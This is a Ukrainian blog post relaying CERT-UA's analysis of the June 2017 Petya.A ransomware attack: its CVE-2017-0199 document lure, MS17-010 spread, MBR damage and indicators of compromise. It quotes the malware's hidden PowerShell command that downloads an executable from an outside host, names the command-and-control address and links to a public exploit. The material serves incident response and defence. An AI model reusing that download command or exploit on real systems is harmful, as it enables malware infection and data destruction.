|
|
|
Автор
Кнопки
|
Про вірус Petya.A, Petya Ransomware,CVE-2017-0199 + MS17-010
27.06.2017 23:08
В першій половині дня (27.06.2017) розпочалася масова атака на
український та комерційний сектор із застосування шкідливого програмного
забезпечення, що позиціонується як Petya Ransomware.
Спеціалістами команди реагування на комп’ютерні надзвичайні
подій України CERT-UA був проаналізований файл:
[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/
Даний файл, експлуатовував вразливість CVE-2017-0199
(https://github.com/bhdresh/CVE-2017-0199).
Після експлуатації вразливості на інфікований комп’ютер
завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/
Після деобфускації коду вдалося вияснити, що за допомогою
команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object
System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’,
‘%APPDATA%\{random_name}.exe’)
Даний виконуваний файл використовувся в якості завантажувача
подальшого функціоналу шифрувальника файлів Petya Ransomware.
Командно-контрольний центр:
hххp://coffeinoffice.xyz:80/cup/wish.php
Механізм розповсюдження був запозичений від шифрувальника
файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як
по локальній так і по глобальній мережі.
Після шифрування комп’ютера відбувалося перезавантаження
системи, в результаті якої жертва отримувала повідомлення про викуп.
Даний тип шифрувальника пошкоджував таблицю MBR, в
результаті чого завантаження операційної системи не продовжувалося.
За попередніми даними даний виконуваний файл завантажував в
директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого
функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів
встановлював в планувальнику задач команду на перезапуск системи. Після
перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.
Отже, можна стверджувати, що новий підвид Petya.A, який
сьогодні атакував Україну — це комбінація вразливостей
CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за
результатами витоку через ShadowBrokers).
Перелік індикаторів компрометації:
84.200.16.242:80
french-cooking.com:443
coffeinoffice.xyz:80
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier
101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier
FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier
736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier
EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
Рекомендації CERT-UA:
По інформації CERT-UA
теги: Petya.A, Petya, Петя, вирус петя, Ransomware, Petya Ransomware, кибератака
Авторские блоги и комментарии к ним отображают исключительно точку зрения их авторов. Точка зрения редакции портала ЛІГА.net и Информационного агентства "ЛІГАБізнесІнформ" может не совпадать с точкой зрения авторов блогов и комментариев к ним. Редакция портала не отвечает за достоверность таких материалов, а портал выполняет исключительно роль носителя
|
Популярные теги
Iryna Berezhna PR адвокат Адвокат Морозов Азаров Александр Прогнимак АТО банк Банки банкротство бизнес бізнес будущее украины бюджет БЮТ валюта Васильев ВВП Верховна Рада Верховная Рада Вибори війна влада власть война выборы газ Геннадий Балашов Гонтарева государство гривна Гройсман ГФС демократия деньги депозит депозиты децентралізація доллар Донбас Донбасс доходы ДТП евроинтеграция евромайдан Европа економіка ЕС євромайдан ЄС жизнь ЖКГ жкх закон законодательство законопроект зарплата Земля инвестиции инвестиции в экономику интернет Ирина Бережная Ігор Ткачук Ірина Бережна Кабмин кадры карьера Киев київ Китай Кличко Кодекс законів про працю України конституция конституція Конституція України коррупция корупція кредит кредиты кризис Крим Крым культура курс Луценко люстрация люстрація майдан маркетинг маркетинг юридических услуг МВФ менеджмент налоги налоги украина налоговые споры Налоговый кодекс народ наука Нафтогаз НБУ НДС недвижимость Николай Гольбин образование общество Одесса Олександр Горобець оппозиция отмена налогов охрименко Павло Петренко парламент партия регионов персонал податки податкові спори политика политтехнологии політика Порошенко правительство право право на працю працедавець працівник президент Прогнимак прогноз Программа социально-экономического развития Украины прокуратура психология денег психология успеха публічний аудит путин Путін работа революция режим Януковича рейдерство реклама рекрутинг Реформа реформи реформы Росія Россия Руслан Сольвар рынки свобода СМИ соціально-економічні права строительство студент суд судебная практика судова практика судова реформа судовий захист США таможня тарифи тарифы тигипко Тимошенко Ткачук трудовий договір. трудові відносини УКБС Украина Україна Укрпочта Укрпошта управление уровень жизни людей Уряд финансы экология экономика Экономика Украины эксперт по миграции экспорт энергетика юрист ющенко янукович Яценюк
Авторы
|
|
© Информационное агентство ЛIГАБiзнесIнформ, 2007-2017
© Информационно-аналитический центр "ЛІГА", 1991-2017
Все права на материалы, размещенные на портале ЛІГА.net, охраняются в соответствии с законодательством Украины.
Комментарии на портале ЛІГА.net временно отключены в связи с аномальной активностью троллей и большим количеством агрессивных и оскорбительных реплик к постам на политические темы.